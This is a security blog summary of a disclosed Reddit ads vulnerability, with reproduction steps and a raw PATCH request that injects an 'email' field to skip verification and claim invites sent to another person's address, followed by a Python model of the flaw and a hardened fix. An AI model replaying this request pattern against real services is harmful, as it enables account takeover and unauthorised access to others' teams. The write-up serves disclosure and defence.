API Security Blog

Reddit: Able to bypass email verification and change email to any other user email

The reporter discovered they were able to hijack invites to other ads teams by adding an extra field, email, to a request, which allowed them to bypass email verification. By doing so they were able to accept invites to ads teams on behalf of others and assume the role of the invitee with their own account.

A snippet of the PoC is included in this summary below.
___

Steps to reproduce
1. Create an account with any email you wish from https://ads.reddit.com
2. Don’t verify your email
3. Go to https://ads.reddit.com/account/account_id/inventory-type and set any value to capture the request.
4. Change your email to any arbitrary email.
5. Your email will be “verified” and you will be able to accept invites sent to the target email if that email had an invite to an ads team.

```
PATCH /api/v2.0/accounts/ HTTP/2
Host: ads-api.reddit.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://ads.reddit.com/
Authorization: Bearer ????????
Content-Type: application/json
Origin: https://ads.reddit.com
Content-Length: 101
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Cache-Control: max-age=0
Te: trailers

{"data":{"brand_safety_tier_preference":"EXPANDED",
"email":"?????"
}}
```
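A server-side model of this bug class and one way to close it, added here as an example (it is not Reddit's code and not part of the original report). It shows a settings PATCH handler that copies every submitted key onto the account beside one that allow-lists fields, stages email changes behind a confirmation token, and ties invite acceptance to a verified address. The `Account` fields, function names and the allow-list are assumptions; the page does not describe how the address came to be treated as verified, so that step is not modelled.

```python
import hmac
import secrets
from dataclasses import dataclass
from typing import Optional

# Assumed allow-list: settings a client may write directly through the PATCH.
PATCHABLE_FIELDS = {"brand_safety_tier_preference"}


@dataclass
class Account:  # hypothetical record, not the real ads account schema
    email: str
    email_verified: bool = False
    brand_safety_tier_preference: str = "STANDARD"
    pending_email: Optional[str] = None
    pending_token: Optional[str] = None


def patch_account_naive(account: Account, data: dict) -> Account:
    # Weak pattern: every submitted key is copied onto the record, so an
    # extra "email" key replaces the address with no ownership check.
    for key, value in data.items():
        setattr(account, key, value)
    return account


def patch_account_hardened(account: Account, data: dict) -> Account:
    unexpected = set(data) - PATCHABLE_FIELDS - {"email"}
    if unexpected:
        raise ValueError(f"fields not writable here: {sorted(unexpected)}")
    for key in PATCHABLE_FIELDS & set(data):
        setattr(account, key, data[key])
    if "email" in data and data["email"].lower() != account.email.lower():
        # Stage the change; the stored address moves only after the token
        # mailed to the new address comes back via confirm_email().
        account.pending_email = data["email"]
        account.pending_token = secrets.token_urlsafe(32)
    return account


def confirm_email(account: Account, token: str) -> bool:
    if not account.pending_token or not hmac.compare_digest(token, account.pending_token):
        return False
    account.email, account.email_verified = account.pending_email, True
    account.pending_email = account.pending_token = None
    return True


def can_accept_invite(account: Account, invite_email: str) -> bool:
    # Invites bind to an address the account has proven it controls.
    return account.email_verified and account.email.lower() == invite_email.lower()
```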
